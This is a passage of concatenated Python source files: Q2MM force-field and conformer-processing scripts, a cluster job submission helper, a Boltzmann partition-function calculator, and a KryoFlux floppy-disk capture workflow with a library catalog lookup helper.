grad.svd_cutoff = None
else:
if len(cutoff_vals) > 2 or \
len(cutoff_vals) < 2:
raise Exception("Cutoff values must " \
"be between two numbers.")
for val in cutoff_vals:
grad.svd_cutoff.append(float(val))
if 'factor' in arg:
                                grad.svd_factor = []
factor_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if factor_vals=='None':
grad.svd_factor = None
else:
for val in factor_vals:
grad.svd_factor.append(float(val))
else:
raise Exception("'{}' : Not Recognized".format(col))
##############################################################
self.ff = grad.run(ref_data=self.ref_data)
if cols[0] == 'SIMP':
simp = simplex.Simplex(
direc=self.direc,
ff=self.ff,
ff_lines=self.ff.lines,
args_ff=self.args_ff)
for col in cols[1:]:
if "max_params" in col:
simp.max_params = col.split('=')[1]
else:
raise Exception("'{}' : Not Recognized".format(col))
self.ff = simp.run(r_data=self.ref_data)
if cols[0] == 'WGHT':
data_type = cols[1]
co.WEIGHTS[data_type] = float(cols[2])
if cols[0] == 'STEP':
param_type = cols[1]
co.STEPS[param_type] = float(cols[2])
def read_loop_input(filename):
with open(filename, 'r') as f:
lines = f.readlines()
lines = [x.partition('#')[0].strip('\n') for x in lines if
x.partition('#')[0].strip('\n') != '']
pretty_loop_input(lines)
return lines
def pretty_loop_input(lines, name='Q2MM', score=None):
logger.log(20, ' {} '.format(name).center(79, '='))
logger.log(20, 'COMMANDS:')
for line in lines:
logger.log(20, '> ' + line)
if score is not None:
logger.log(20, 'SCORE: {}'.format(score))
logger.log(20, '=' * 79)
logger.log(20, '')
return lines
def pretty_loop_summary(cycle_num, score, change):
logger.log(20, ' Cycle {} Summary '.format(
cycle_num).center(50, '-'))
logger.log(20, '| PF Score: {:36.15f} |'.format(score))
logger.log(20, '| % change: {:36.15f} |'.format(change * 100))
logger.log(20, '-' * 50)
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument(
'input', type=str, help='Filename containing loop commands.')
opts = parser.parse_args(args)
lines = read_loop_input(opts.input)
loop = Loop()
loop.run_loop_input(lines)
if __name__ == '__main__':
# if os.path.isfile('root.log'):
# os.remove('root.log')
logging.config.dictConfig(co.LOG_SETTINGS)
main(sys.argv[1:])
```
#### File: smiles_to_catvs/scripts/prepare.py
```python
import os,glob
from multiprocessing import Pool
import pubchempy as pcp
import requests as rq
import ast
def CID_to_IUPAC(cid):
pre_url = "https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/CID/"
post_url = "/record/SDF/?record_type=3d&response_type=display"
c = pcp.Compound.from_cid(cid)
name = c.iupac_name
if name == None:
return None
else:
return name
center=""" P3-Z0-P3
1
"""
txt1 =""" s_cs_pattern
b_cs_use_substructure
"""
txt2 =""" b_cs_comp
b_cs_chig
"""
txt3 = """ b_cs_tors
i_cs_rca4_1
i_cs_rca4_2
r_cs_torc_a5
r_cs_torc_a6
r_cs_torc_b5
r_cs_torc_b6
i_cs_torc_a1
i_cs_torc_a4
i_cs_torc_b1
i_cs_torc_b4
"""
def prepare_mae_for_screen(file,s_txt):
CID = file.replace(".mae","")
infile = open(file,"r")
flines = infile.readlines()
output = ""
count = 0
b_cs = 0
rca4 = None
rot = None
chiral = None
for line in flines:
if CID in line:
iupac = CID_to_IUPAC(CID)
if iupac == None:
output += line
else:
# output += iupac + "\n"
output += line.replace(CID,iupac.replace(" ",""))
elif "i_m_ct_format" in line:
output += line + txt1
elif "m_atom" in line and count == 0:
output += s_txt + line
count = 1
elif " PD " in line:
numb = line.split()[1]
output += line.replace(" {} ".format(numb)," 62 ")
elif "CHIRAL" in line:
chiral = "".join(line.split()[1:])
chiral = ast.literal_eval(chiral)
elif "RCA4" in line:
rca4 = "".join(line.split()[1:])
rca4 = ast.literal_eval(rca4)
elif "ROT" in line:
rot = "".join(line.split()[1:])
rot = ast.literal_eval(rot)
else:
output += line
old_out = output
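    # Second pass: walk the rebuilt block again and append the per-atom
    # (comparison, chirality) and per-bond (torsion, ring-closure) flags.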
output = ""
count = 0
for line in old_out.splitlines():
if "m_atom" in line:
count = 1
output += line
elif count == 1 and ":::" in line:
count = 2
output += txt2 + line
# atom flag
elif count == 2 and ":::" in line:
count = 3
output += line
# bond flag
elif count == 3 and ":::" in line:
count = 4
output += txt3 + line
# turn off
elif count == 4 and ":::" in line:
count = 5
output += line
# atom
elif count == 2:
chi = 0
atidx = int(line.split()[0])
if atidx in chiral:
chi = 1
comp = 1
if "H " in line:
comp = 0
output += line + " {} {}".format(comp,chi)
# bond
elif count == 4:
bond = list(map(int,line.split()[1:3]))
tors = 0
if bond in rot or bond[::-1] in rot:
tors = 1
rca4_1 = 0
rca4_2 = 0
for rca in rca4:
if bond == rca[1:3]:
rca4_1 = rca[0]
rca4_2 = rca[3]
elif bond[::-1] == rca[1:3]:
rca4_1 = rca[3]
rca4_2 = rca[0]
output += line + " {} {} {} 0 0 0 0 0 0 0 0".format(tors,rca4_1,rca4_2)
else:
output += line
output += "\n"
return output
os.system("mkdir ligands")
os.chdir("./maes")
if 1:
for nfile, file in enumerate(glob.glob("*.mae")):
n = nfile + 1
print(file)
text = prepare_mae_for_screen(file,center)
outfile = open("temp","w")
outfile.write(text)
outfile.close()
os.system("cp temp ../ligands/{}.mae".format(str(n)))
def prepare(filenames):
for fn0 in filenames:
text = prepare_mae_for_screen(fn0,center)
fn = fn0.replace(".mae","")
temp = "{}.temp".format(fn)
outfile = open(temp,"w")
outfile.write(text)
outfile.close()
os.system("mv {} ../ligands/{}.mae".format(fn,fn))
return 0
if 0:
fns = glob.glob("*.mae")
# number of threads for parallel job
nt = 32
lf = len(fns)
nj = int(lf/nt)
nr = int(lf%nt)
ni = 0
count = 0
file_split=[]
for i in range(nt-1):
fn = fns[ni:ni+nj]
file_split.append(fn)
count += len(fn)
ni = ni + nj
for i in range(nr):
file_split[i].append(fns[ni+i])
with Pool(processes=nt) as pool:
multiple_jobs = [pool.apply_async(prepare,(files,)) for files in file_split]
[res.get() for res in multiple_jobs]
```
#### File: smiles_to_catvs/scripts/sdf_to_mae.py
```python
import openbabel as ob
import pybel as pb
import numpy as np
import glob, os
import multiprocessing as mp
from multiprocessing import Pool
def bmin_call(file_list):
for filename in file_list:
infile = filename.replace(".com","")
os.system("bmin -WAIT {};".format(infile))
return 0
def cons_opt(infile,outfile,idx):
"""
Only Mol2/UFF can Optimize
Optimize with Pd1-P-P1 constraints
:param infile:
:param outfile:
:param idx:
:return:
"""
p1,p2,pd = idx
conv = ob.OBConversion()
conv.SetInAndOutFormats("mol2", "mol2")
mol = ob.OBMol()
conv.ReadFile(mol, infile)
cons = ob.OBFFConstraints()
pp = 3.2
ppd = 2.4
cons.AddDistanceConstraint(p1, p2, pp)
cons.AddDistanceConstraint(p1, pd, ppd)
cons.AddDistanceConstraint(p2, pd, ppd)
# Set up FF
ff = ob.OBForceField.FindForceField("UFF")
ff.Setup(mol, cons)
ff.SetConstraints(cons)
ff.EnableCutOff(True)
# Optimize
ff.ConjugateGradients(10000)
ff.GetCoordinates(mol)
def ring_bond(ring):
"""
:param ring: OBRing class
:return: list of lists [atom1,atom2]
"""
bonds = []
mol = ring.GetParent()
for bond in ob.OBMolBondIter(mol):
at1 = bond.GetBeginAtom().GetIndex() + 1
at2 = bond.GetEndAtom().GetIndex() + 1
if ring.IsMember(bond):
if not bond.IsAromatic():
bonds.append(sorted([at1,at2]))
return bonds
def common_atom(bond,bonds):
"""
:param bond: list [atom1,atom2]
:param bonds: list of list [atom1,atom2]
:return: True if there is common atom in bonds
"""
result = False
if len(bonds) == 0:
return result
for bond2 in bonds:
for at1 in bond:
for at2 in bond2:
if at1 == at2:
result = True
return result
return result
# extract ring info
# iterate over all bond
# CHIRAL ATOMS
chiral = []
for atom in ob.OBMolAtomIter(mol):
if atom.IsChiral():
chiral.append(atom.GetIndex() + 1)
rot_bond = []
rca4 = []
rca23 = []
for bond in ob.OBMolBondIter(mol):
at1 = bond.GetBeginAtom().GetIndex() + 1
at2 = bond.GetEndAtom().GetIndex() + 1
# print(at1, at2)
if bond.IsRotor() and not bond.IsAromatic():
rot = sorted([at1,at2])
# print(outfile,"ROT ",rot)
rot_bond.append(rot)
if bond.IsClosure():
rca0 = sorted([at1,at2])
rca = sorted([at1,at2])
# The Assumption is IsClosure picking up only one bond in the ring
# and bond.IsRotor() does not provide any ring bonds.
# to prevent rca23 sharing common atoms
if len(rca23) != 0:
if common_atom(rca,rca23):
ringbonds = ring_bond(bond.FindSmallestRing())
for rbond in ringbonds:
if common_atom(rbond,rca23):
continue
else:
rca0 = rbond.copy()
rca = rbond.copy()
break
else:
ringbonds = ring_bond(bond.FindSmallestRing())
for rbond in ringbonds:
if not (rbond[0] in rca or rbond[1] in rca):
rca0 = rbond.copy()
rca = rbond.copy()
break
rca23.append(rca0)
#print(outfile,"RING OPENING BOND", rca0)
ring = bond.FindSmallestRing()
ring_rots = []
if not ring.IsAromatic():
for bond1 in ob.OBMolBondIter(mol):
if ring.IsMember(bond1):
b1 = bond1.GetBeginAtom().GetIndex() + 1
b2 = bond1.GetEndAtom().GetIndex() + 1
rot = sorted([b1,b2])
if rot != rca0:
ring_rots.append(rot)
#print("RING ROT:",ring_rots)
for rrot in ring_rots:
if rca0[0] in rrot:
atom = rrot.copy()
atom.remove(rca0[0])
#print(atom)
rca.insert(0,atom[0])
#print("INSERT ",rca)
elif rca0[1] in rrot:
atom = rrot.copy()
atom.remove(rca0[1])
#print(rca)
rca.append(atom[0])
#print("APPEND ",rca)
elif rca0 != rot:
rot_bond.append(rrot)
rca4.append(rca)
# print(outfile,"CHIRAL",chiral)
# print(outfile,"RCA4",rca4)
# print(outfile,"RCA23",rca23)
check = []
for rr in rca4:
check.append(rr[1])
check.append(rr[2])
bond = sorted([rr[1],rr[2]])
if bond in rot_bond:
rot_bond.remove(bond)
if len(check) != len(set(check)):
print("\t\tBAD",outfile)
print("\t\t",rca4)
# else:
# print("\t\tBAD",outfile)
# print(outfile,"ROT", rot_bond)
conv.WriteFile(mol, outfile)
return chiral, rca4, rot_bond
def to_mol2(infile,outfile):
conv = ob.OBConversion()
conv.SetInAndOutFormats("sdf","mol2")
mol = ob.OBMol()
conv.ReadFile(mol, infile)
conv.WriteFile(mol, outfile)
def add_pd(infile,outfile):
conv = ob.OBConversion()
conv.SetInAndOutFormats("mol2","mol2")
mol = ob.OBMol()
conv.ReadFile(mol, infile)
nAtoms = mol.NumAtoms()
p = []
for i in range(nAtoms):
n = i + 1
at = mol.GetAtom(n)
an = (at.GetAtomicNum())
if an == 15:
p.append(n)
elif an == 8:
# Oxygen
neis = []
for nei in ob.OBAtomAtomIter(at):
neis.append(nei)
# Oxygen has one neighbor
lnei = len(neis)
if lnei == 1:
nei = neis[0]
# neighbor is P (i.e. P=O)
if nei.GetAtomicNum() == 15:
return None
if len(p) != 2:
return None
# optimize for P-P distance first
p1, p2 = p
cons = ob.OBFFConstraints()
pp = 3.2
cons.AddDistanceConstraint(p1, p2, pp)
# Set up FF
ff = ob.OBForceField.FindForceField("UFF")
ff.Setup(mol, cons)
ff.SetConstraints(cons)
ff.EnableCutOff(True)
# Optimize
ff.ConjugateGradients(10000)
ff.GetCoordinates(mol)
cont = True
while cont:
pho1 = mol.GetAtom(p1)
pho2 = mol.GetAtom(p2)
pp1 = pho1.GetDistance(pho2)
err0 = abs(pp1-pp)
if err0 < 0.015:
cont = False
else:
print("\tNOT converged YET:",outfile, " diff:", err0)
ff.ConjugateGradients(10000)
ff.GetCoordinates(mol)
p = []
pxyz = []
nxyz = []
# find out where two P are located
for i in range(nAtoms):
n = i + 1
at = mol.GetAtom(n)
an = (at.GetAtomicNum())
if an == 15:
p.append(n)
pxyz.append([at.x(),at.y(),at.z()])
else:
nxyz.append([at.x(),at.y(),at.z()])
nxyz = np.array(nxyz)
# Add Pd and connect it to two Ps
a = mol.NewAtom()
a.SetAtomicNum(46)
pxyz = np.array(pxyz)
x,y,z = (pxyz[0] + pxyz[1])/2
pdxyz = np.array([x,y,z])
vec0 = None
r0 = 100.0
for vec in nxyz:
vec = vec - pdxyz
r = np.linalg.norm(vec)
if r < r0:
r0 = r
vec0 = vec
x,y,z = pdxyz-10.0*vec0
a.SetVector(x,y,z)
# AddBond(BeginIdx,EndIdx,bond order)
pd = mol.NumAtoms()
p1,p2 = p
mol.AddBond(pd,p1,1)
mol.AddBond(pd,p2,1)
mol.NumAtoms()
conv.WriteFile(mol, outfile)
return [p1,p2,pd]
def sdf_to_mae(filenames):
for fn0 in filenames:
fn = fn0.replace(".sdf","")
# print("reading {}".format(fn))
to_mol2(fn0,"{}.0temp".format(fn))
index = add_pd("{}.0temp".format(fn),"{}.temp".format(fn))
if index != None:
chiral, rca4, rot = cons_opt("{}.temp".format(fn),"{}.mol2".format(fn),index)
print("molecule ",fn, "finished")
os.system("mv {}.mol2 ../mol2/".format(fn))
os.system("mol2convert -imol2 ../mol2/{}.mol2 -omae ../maes/{}.mae".format(fn,fn))
os.system("echo 'CHIRAL {}\nRCA4 {}\n ROT {}' >> ../maes/{}.mae".format(chiral, rca4,rot,fn))
return 0
# Get the list of sdf files in current directory
# for loop all
os.system("mkdir ./mol2")
os.system("mkdir ./maes")
os.chdir("./sdf")
if 1:
fns = glob.glob("*.sdf")
# number of threads for parallel job
nt = 32
lf = len(fns)
nj = int(lf/nt)
nr = int(lf%nt)
ni = 0
count = 0
file_split=[]
for i in range(nt-1):
fn = fns[ni:ni+nj]
file_split.append(fn)
count += len(fn)
ni = ni + nj
for i in range(nr):
file_split[i].append(fns[ni+i])
with Pool(processes=nt) as pool:
multiple_jobs = [pool.apply_async(sdf_to_mae,(files,)) for files in file_split]
[res.get() for res in multiple_jobs]
```
#### File: q2mm/tools/submit.py
```python
#!/usr/bin/env python
import argparse
import sys
import os
import subprocess as sp
DEFAULT_SUB_FILE = '''#!/bin/csh
#$ -M <EMAIL>
#$ -m ae
#$ -N {}
#$ -q {}
#$ -r n
{}
module load schrodinger/2015u3
module load gaussian/09D01
module load tinker
setenv SCHRODINGER_TEMP_PROJECT "~/.schrodtmp"
setenv SCHRODINGER_TMPDIR "~/.schrodtmp"
setenv SCHRODINGER_JOBDB2 "~/.schrodtmp"
{}'''
#Change the default user here
defaultuser='arosale4'
def CRC_qsub(job_name,USER,QUEUE,CPU,COMMAND):
## Writes the submission file with all the appropriate options: job name,
## queue, processors, and the job command.
submission_file = open(job_name + '.sh', 'w')
submission_file.write(
DEFAULT_SUB_FILE.format(job_name,USER,QUEUE,CPU,COMMAND.format(
job_name + '.com')))
submission_file.close()
def queue(opts):
## Queue option of the crc. I think I can only use long and debug, which
## long is the default.
if opts.queue:
QUEUE = opts.queue
else:
QUEUE = 'long'
return QUEUE
def processors(opts):
## Sets the number of processors to request from the CRC. Default is to use
## 8 processors. When there is no argument to follow ("-pe") then this
## section is removed to allow for only one processor. An additional
## argument will just write that argument, e.g. "-pe -pe smp 16" would add
## #$ -pe smp 16 to the submission script.
if opts.processors == 'default':
CPU = '#$ -pe smp 8'
elif opts.processors == 'none':
CPU = ' '
else:
CPU = '#$ ' + opts.processors
return CPU
def command(opts):
    ## Sets the actual command to run. By default it will do a gaussian
## job. Example of an alternative is "--command bmin -WAIT conf_search"
if opts.command:
COMMAND = opts.command
else:
COMMAND = 'g09 {}'
return COMMAND
def main(args):
parser = return_parser()
opts = parser.parse_args(args)
QUEUE = queue(opts)
CPU = processors(opts)
COMMAND = command(opts)
if opts.username:
USER = opts.username
else:
USER = defaultuser
for filename in opts.filename:
run_file = os.path.splitext(filename)[0]
CRC_qsub(run_file,USER,QUEUE,CPU,COMMAND)
sp.call('qsub {}.sh'.format(run_file), shell=True)
# print('This is where you would run the following command')
# print('>>>>> qsub {}.sh'.format(run_file))
def return_parser():
parser = argparse.ArgumentParser(
description='To fill out later')
parser.add_argument(
'filename', type=str, nargs='+', help='Filename')
parser.add_argument(
'-q','--queue', type=str, help='"long" or "debug"')
parser.add_argument(
'-pe','--processors', type=str, nargs='?', const='none',
default='default', help='No option string = default smp 8; \n'
'Option string but no argument = no multiple processing; and \n'
'Option string with argument = "#$" + argument')
parser.add_argument(
        '-c','--command', type=str, help='Command to be run. The \
        default will be to perform a g09 calculation on #')
parser.add_argument(
'-u','--username', type=str, help='<NAME> CRC user name. Probably \
a NetID.')
return parser
if __name__ == '__main__':
main(sys.argv[1:])
##################################
```
#### File: q2mm/tools/sumq.py
```python
from __future__ import print_function
import argparse
import os
import re
import sys
from itertools import chain
from math import exp, log
K = 0.008314459848 # kJ K^-1 mol^-1
ENERGY_LABEL = 'r_mmod_Potential_Energy-MM3*'
RE_ENERGY = ('(\s|\*)Conformation\s+\d+\s\(\s+(?P<energy>[\d\.\-]+)\s+kJ/mol\) '
'was found\s+(?P<num>[\d]+)')
HARTREE_TO_KJMOL = 2625.5 # Hartree to kJ/mol
def read_energy_from_macro_log(filename,
max_structures=None,
max_energy=None):
energies = []
with open(filename, 'r') as f:
energy_section = False
for line in f:
if '*** MC Statistics ***' in line:
energy_section = False
if 'Total number of structures processed =' in line:
num_str = int(line.split()[6])
energy_section = True
if energy_section:
matched = re.match(RE_ENERGY, line)
if matched != None:
energy = float(matched.group('energy'))
num = int(matched.group('num'))
if max_energy and len(energies) > 0:
# Inefficient.
zero = min(energies)
if energy - zero > max_energy:
break
# print(energy)
energies.append(energy)
# Thought I'd try this out. Doesn't really work.
# Idea was that it would append the energy * the number of
# times that the conformation was located. Didn't really
# change things much.
# Anyway, reasoning for this was that we're really trying
# to explore how soft or hard the PES surface about the TS
# is. Many mid energy conformers may mean more than few
# slightly lower energy conformers.
# energies.extend([energy] * num)
if max_structures:
if len(energies) == max_structures:
break
return energies
def read_energy_from_mae(filename):
"""
Reads energies from *.mae files.
Energies are read and saved as kJ/mol.
"""
path_of_this_file = os.path.dirname(os.path.realpath(__file__))
path_of_q2mm = os.path.join(path_of_this_file, '../q2mm')
sys.path.append(path_of_q2mm)
import filetypes
mae = filetypes.Mae(filename)
energies = [float(x.props[ENERGY_LABEL]) for x in mae.structures]
return energies
def read_energy_from_gau_log(filename):
"""
Reads energies from *.log Gaussian files.
Also converts Hartrees to kJ/mol for saving.
"""
path_of_this_file = os.path.dirname(os.path.realpath(__file__))
path_of_q2mm = os.path.join(path_of_this_file, '../q2mm')
sys.path.append(path_of_q2mm)
import filetypes
# This is actually a little misleading seeing as these archives only contain
# one HF energy, and typically each file only contains one archive.
energies = []
file_ob = filetypes.GaussLog(filename)
try:
file_ob.read_archive()
for structure in file_ob.structures:
energies.append(float(structure.props['HF']) * HARTREE_TO_KJMOL)
return energies
except IndexError:
raise
def make_relative(energies):
"""
Makes all energies relative.
Expects a list of lists, flattens it, finds the minimum, makes all energies
in all lists relative.
Returns
-------
list of lists of floats
"""
zero = min(chain.from_iterable(energies))
zero_energies = []
for group_energies in energies:
zero_energies.append([x - zero for x in group_energies])
return zero_energies
def return_parser():
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
'-g', '--group', metavar='filename',
type=str, nargs='+', action='append',
help='Group of filenames.')
parser.add_argument(
'-n', '--max_structures', metavar='i',
type=int,
help='Stop reading an individual file after reading i structures.')
parser.add_argument(
'-m', '--max_energy', metavar='f',
type=float,
help="Don't read any structures that have a relative energy above f.")
parser.add_argument(
'-a', '--appendfile', metavar='filename',
type=str,
help='Also append CSV style output to a file.')
parser.add_argument(
'-t', '--temperature', type=float, default=298.15,
help='Self-explanatory. Default is 298.15 K.')
return parser
def calc_q(energies, temperature=298.15):
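    # Sum of Boltzmann factors exp(-E/kT) over each group's relative energies.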
# Beta
beta = 1 / (K * temperature)
qs = []
for group_energies in energies:
q = sum([exp(-beta*x) for x in group_energies])
qs.append(q)
return qs
def sumq(groups,
appendfile=None,
max_energy=None,
max_structures=None,
temperature=298.15):
# list of lists
# Each sublist contains all the energies for a grouping of
# structures/filenames.
energies = []
# Get all the partition function values.
for group in groups:
group_energies = []
for filename in group:
if filename.endswith('.log'):
# Need system for handling both types of .log files.
try:
e = read_energy_from_gau_log(filename)
except IndexError:
e = read_energy_from_macro_log(
filename,
max_structures=max_structures,
max_energy=max_energy)
group_energies.extend(e)
elif filename.endswith('.mae'):
e = read_energy_from_mae(filename)
group_energies.extend(e)
energies.append(group_energies)
e1 = energies[0][0]
e2 = energies[1][0]
energies = make_relative(energies)
# Output code.
border = ' % CONTRIBUTION TO TOTAL '.center(50, '-')
print(border)
qs = calc_q(energies, temperature=temperature)
total_q = sum(qs)
stuff = []
for i, q in enumerate(qs):
ratio = q / total_q
print('Group {}: {}'.format(i + 1, ratio))
stuff.append(ratio)
# Additional output for when there are only 2 isomers.
print(' OUTPUT FOR 2 GROUPS '.center(50, '-'))
if len(qs) == 2:
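        # The ratio of the two Boltzmann sums approximates the dr/er, and the
        # free energy difference below follows from ddE = kT*ln(q1/q2).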
dr12 = qs[0] / qs[1]
dr21 = qs[1] / qs[0]
# Changing sign temporarily.
de = - (dr12 - 1) / (dr12 + 1) * 100
dde = K * temperature * log(qs[0]/qs[1])
print('% dr/er (Group 1 : Group 2): {}'.format(dr12))
print('% dr/er (Group 2 : Group 1): {}'.format(dr21))
print('% de/ee: {}'.format(de))
print('ddE (kJ/mol): {}'.format(abs(dde)))
if appendfile:
with open(appendfile, 'a') as f:
names1 = ' '.join(groups[0])
names2 = ' '.join(groups[1])
f.write('{},{},{},{},{},{},{},{}\n'.format(
names1,
names2,
e1,
e2,
dr12,
dr21,
de,
dde))
print('-' * len(border))
print('This should equal 1: {}'.format(sum(stuff)))
def main(args):
parser = return_parser()
opts = parser.parse_args(args)
sumq(opts.group,
opts.appendfile,
opts.max_energy,
opts.max_structures,
opts.temperature)
if __name__ == '__main__':
args = sys.argv[1:]
main(args)
```
|
{
"source": "jesswhyte/floppycapture",
"score": 3
}
|
#### File: jesswhyte/floppycapture/floppy-nocall.py
```python
import sys
import argparse
import os
import subprocess as subproc
import datetime
import re
#######################
###### ARGUMENTS ######
#######################
parser = argparse.ArgumentParser(
description ="Script to walk through floppy disk capture workflow, Jan 2018")
parser.add_argument(
'-c', '--collection', type=str,
help='collection/accession/box/whatever',
required=True)
parser.add_argument(
'-d','--dir', type=str,
help='Start directory, e.g. /home/jess/CAPTURED', required=True)
parser.add_argument(
'-i','--i4',action='store_true',
help='use flag to default to i4/MFM')
parser.add_argument(
'-m', '--mediatype', type=str,
help='Use \"3.5\" or \"5.25\"',required=True,
choices=['3.5','5.25'])
parser.add_argument(
'-t', '--transcript', type=str,
help='Transcript of label', required=False)
parser.add_argument(
'-n','--note', type=str,
help='capture notes', required=False)
parser.add_argument(
'-k', '--key',type=str,
help='diskID',required=True)
## Array for all args passed to script
args = parser.parse_args()
###############################
########## VARIABLES ##########
###############################
drive = "d0"
date = datetime.datetime.today().strftime('%Y-%m-%d')
collection = args.collection
mediaType = args.mediatype
key = args.key
dir = args.dir
note=args.note
if args.transcript:
label = args.transcript
else:
label = "no disk label"
#################################
########## CLASS STUFF ##########
#################################
# font colors, visit https://gist.github.com/vratiu/9780109 for a nice guide to the color codes
class bcolors:
OKGREEN = '\033[92m' #green
INPUT = '\033[93m' #yellow, used for when user input required
FAIL = '\033[91m' #red, used for failure
ENDC = '\033[0m' # end color
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
GREENBLOCK = '\x1b[1;31;40m' # green with background, used for updates user should check (e.g. Title/Cat report)
ENDGB = '\x1b[0m' #end x1b block
####################################
############ FUNCTIONS #############
####################################
### TODO: rewrite kfStream as subprocess, temp)
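# kfStream: shell out to the KryoFlux dtc tool to capture a raw preservation
# stream and tee the capture log alongside it.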
def kfStream():
os.system(
"dtc -"+drive+" -fstreams/"+key+"/"
+key+"_stream -i0 -i4 -i9 -i2 -t2 -l8 -p | tee "
+outputPath+key+"_capture.log")
#takes existing stream, attemps to make image based on given fileSystem
def kfImage(fileSystem):
os.system(
"dtc -fstreams/"+key+"/"
+key+"_stream00.0.raw -i0 -f"+outputPath+key+"_disk.img -"
+fileSystem+" -m1")
#Takes preservation stream + attempts to create i4 or MFM disk image
def kfi4():
os.system(
"dtc -"+drive+" -fstreams/"+key+"/"
+key+"_stream -i0 -f"+outputPath+key+
"_disk.img -i4 -t1 -l8 -p | tee "+outputPath+key+"_capture.log")
########################
##### THE GOODS ######
########################
### check Media, set drive
if mediaType == "3.5":
drive = "d0"
elif mediaType == "5.25":
drive = "d1"
### Change working directory
if not os.path.exists(dir):
os.makedirs(dir)
os.chdir(dir)
### Create directory for output if it doesn't exist
outputPath = collection+"/"+key+"/"
### JW NOTE: Check if os.path exists and then ask whether or not to proceed and how
if os.path.exists(outputPath):
replacePath = input(bcolors.INPUT+"path already exists, proceed anyway y/n? "+bcolors.ENDC)
if replacePath.lower() == 'y' or replacePath.lower() == 'yes':
# replaceStream only an option, because sometimes I want to keep original photo/metadata, but want to try # replacing what might have been a previously unsuccessful capture, e.g. if there is another copy of disk
replaceStream = input(bcolors.INPUT+"Replace stream/image **ONLY** y/n? "+bcolors.ENDC)
if replaceStream.lower() == 'y' or replaceStream.lower() == 'yes':
go = input(bcolors.INPUT+"Please insert disk and hit Enter"+bcolors.ENDC)
if args.i4:
kfi4()
else:
kfStream()
fileSystem = input(bcolors.INPUT+"Which filesytem? "+bcolors.ENDC)
kfImage(fileSystem)
sys.exit("-Stream/image replaced. No other entries updated. Exiting...")
if replaceStream.lower() == 'n' or replaceStream.lower() =='no':
            replaceStream = 'no'
print(bcolors.OKGREEN+"Replacing "+key+" ..."+bcolors.ENDC)
if replacePath.lower() == 'n' or replacePath.lower() == 'no':
sys.exit("-No entries updated. Exiting...")
if not os.path.exists(outputPath):
os.makedirs(outputPath)
### CAMERA - TAKE A PICTURE - VERY ENV SPECIFIC TO MY CAMERA
photoPrompt = input("Do you want to photograph the disk? (Warning: requires /dev/video0 device connected) [y/n]")
if photoPrompt == "y":
picName = key + ".jpg"
picParameters = " -f video4linux2 -s 1600x1200 -i /dev/video0 -ss 0:0:6 -frames 1 -hide_banner -loglevel panic "+outputPath+picName
gopic = input(bcolors.INPUT+"Please place disk for picture and hit Enter"+bcolors.ENDC)
print("Wait please...taking picture...")
os.system("ffmpeg"+picParameters)
### Double check pic worked and warn if it didn't:
if os.path.exists(
outputPath+picName):
print("-Pic: %s%s taken" % (outputPath,picName))
else:
print(bcolors.FAIL+"-Pic: %s%s NOT TAKEN. CHECK CAMERA + FFMPEG SETTINGS" % (outputPath,picName))
### KRYOFLUX - GET A PRESERVATION STREAM
## Pause and give user time to put disk in
go = input(bcolors.INPUT+"Please insert disk and hit Enter"+bcolors.ENDC)
## take the stream only if it doesn't already exist
## note: streams do not go in diskID directory
if os.path.exists("streams/"+key+"/"+key+"_stream00.0.raw"):
replaceStream = input(bcolors.INPUT+"streams/"+key+"/"+key+"_stream00.0.raw exists, replace y/n? "+bcolors.ENDC)
if replaceStream.lower() == 'y' or replaceStream.lower() == 'yes':
if args.i4:
kfi4()
else:
kfStream()
fileSystem = input(bcolors.INPUT+"Which filesytem? "+bcolors.ENDC)
kfImage(fileSystem)
else:
# if replaceStream=N, still ask if user wants to update metadata/master log
replaceMeta = input(bcolors.INPUT+"replace metadata and create new log entry y/n? "+bcolors.ENDC)
if replaceMeta.lower() == 'n' or replaceMeta.lower() == 'no':
# if replaceMeta=N, close out and exit, otherwise carry on
            # metadata.close()  # no metadata file is opened in this no-call variant
sys.exit ("-Exiting...")
else:
if args.i4:
# take preservation stream and MFM image at same time
kfi4()
else:
# take preservation stream, then ask which filesystem, e.g. i9 or i4, etc.
kfStream()
fileSystem = input(bcolors.INPUT+"Which filesytem? "+bcolors.ENDC)
if not os.path.exists(outputPath+"_disk.img"):
# create image from stream, based on provided filesystem
kfImage(fileSystem)
#########################################
#### END MATTER and METADATA UPDATES ####
#########################################
### Update master log
## TODO: this should really use csv library, I was lazy
## User asked if they'd like to update the notes they entered
noteupdate = input(bcolors.INPUT+"If you would like to update the disk notes (currently: "+bcolors.OKGREEN+str(note)+bcolors.ENDC+bcolors.INPUT+"), please re-enter, otherwise hit Enter: "+bcolors.ENDC)
if noteupdate:
note = noteupdate
print("-Note has been updated to: " + bcolors.OKGREEN + str(note) + bcolors.ENDC)
else:
note = "No-transcript"
print("-Note unchanged...")
## Open and update the masterlog - projectlog.csv
log = open('projectlog.csv','a+')
print("-Updating log...")
log.write(
"\n"+collection+","+key+","+mediaType+
","+"\""+label+"\",\""+str(note)+"\"")
if os.path.exists(
outputPath+key+"_disk.img"):
log.write(",img=OK")
else:
log.write(",img=NO")
log.write(","+date)
### Close master log
log.close()
sys.exit ("-Exiting...to extract logical files from your disk images and generate .csv manifests, please run disk-img-extraction.sh on collection directory")
```
#### File: floppycapture/helpers/getcall.py
```python
import sys
import argparse
import os
import subprocess as subproc
import json
import urllib
import re
from urllib.request import urlopen
from collections import OrderedDict
###### ARGUMENTS ######
parser = argparse.ArgumentParser(
description ="Script to convert catkey to callnum for, say, filenames. Usage python3 getcall.py <catkey>")
parser.add_argument(
'-k', '--key', type=str,
help='catkey', required=True)
## Array for all args passed to script
args = parser.parse_args()
catKey = args.key
def get_json_data(url):
response = urlopen(url)
data = response.read().decode()
return json.loads((data), object_pairs_hook=OrderedDict)
### do a catalog call based on the catkey
catUrl = str("https://search.library.utoronto.ca/details?%s&format=json" % catKey) #set catalog search url based on catkey
# make a dictionary out of the response from catUrl
cat_dic = get_json_data(catUrl) #run get_json_data function using catUrl)
title = cat_dic['record']['title'] #set the $title variable based on record.title in json
callnumber = cat_dic['record']['holdings']['items'][0]['callnumber']
#print(callnumber) ## if you want to print original call number
#callnumber = callnumber.replace('.','-') ## if you wanted to replace dots with dashes
callnumber = callnumber.replace(' ','_')
print(callnumber)
sys.exit (0) #exit
```
#### File: floppycapture/helpers/metadata.py
```python
import sys
import argparse
import os
